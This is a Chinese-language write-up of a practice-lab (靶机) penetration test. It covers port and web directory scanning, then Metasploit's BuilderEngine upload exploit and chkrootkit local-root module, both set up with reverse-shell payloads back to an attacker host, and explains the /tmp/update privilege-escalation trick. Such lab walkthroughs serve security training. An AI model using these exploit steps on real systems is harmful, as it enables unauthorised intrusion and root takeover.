靶场搭建
下载靶机,直接导入,开启NAT模式就OK
IP:192.168.1.131
信息初收集
端口开放:
22/tcp open ssh
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
8080/tcp open http-proxy
46322/tcp open unknown目录收集
[02:38:38] 301 - 314B - /blocks -> http://192.168.1.131/blocks/
[02:38:41] 200 - 392B - /codeception.yml
[02:38:50] 301 - 313B - /files -> http://192.168.1.131/files/
[02:38:50] 200 - 522B - /files/
[02:38:59] 200 - 706B - /license.txt
[02:39:05] 301 - 315B - /modules -> http://192.168.1.131/modules/
[02:39:05] 200 - 538B - /modules/
[02:39:18] 200 - 36B - /robots.txt
[02:39:19] 403 - 293B - /server-status
[02:39:19] 403 - 294B - /server-status/
[02:39:26] 301 - 314B - /system -> http://192.168.1.131/system/
[02:39:26] 200 - 120B - /system/
[02:39:27] 301 - 314B - /themes -> http://192.168.1.131/themes/
[02:39:27] 200 - 503B - /themes/
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 65, size: 53fb059bb5bc8, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /files/: Directory indexing found.
+ /files/: This might be interesting.
+ /system/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /license.txt: License file found may identify site software.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.服务详细识别:
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
46322/tcp open status 1 (RPC #100024)通过themes的信息收集,找到他的主题是Default 2015 Theme for BuilderEngine V3.
在metasploit中搜索这个主题发现有漏洞的,我们直接利用
渗透过程
builderengine拿shell
利用metasploit中的模块拿到shell
msf6 exploit(multi/http/builderengine_upload_exec) > show options
Module options (exploit/multi/http/builderengine_upload_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.131 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to BuilderEngine
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 BuilderEngine 3.5.0
View the full module info with the info, or info -d command.提权
查看运行的程序,看到chkrootkit程序,通过使用metasploit中相关模块,进行提权
msf6 exploit(unix/local/chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION 1 yes The session to run this module on
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.run起来之后等待执行反弹shell即可。
小结
chkrootkit漏洞利用原理在这里:https://www.exploit-db.com/exploits/33899
定时执行/tmp/update,把命令写入这里,按照chkrootkit的用户权限执行。直接拿到root权限的。